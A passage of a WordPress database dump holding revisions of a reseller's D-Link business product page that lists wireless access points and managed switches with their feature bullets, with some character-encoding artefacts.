server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports</p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint</p><p>Support IEEE 802.1Q VLAN traffic segregation</p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems</p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime</p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation</p><p>Cable diagnostics function to help troubleshooting wiring problem</p><p>Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]</p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 15:10:38','2019-09-25 07:10:38','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3420,1,'2019-09-25 15:11:18','2019-09-25 07:11:18','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports</p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint</p><p>Support IEEE 802.1Q VLAN traffic segregation</p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems</p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime</p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation</p><p>Cable diagnostics function to help troubleshooting wiring problem</p><p>Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]</p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 15:11:18','2019-09-25 07:11:18','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3421,1,'2019-09-25 15:11:45','2019-09-25 07:11:45','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 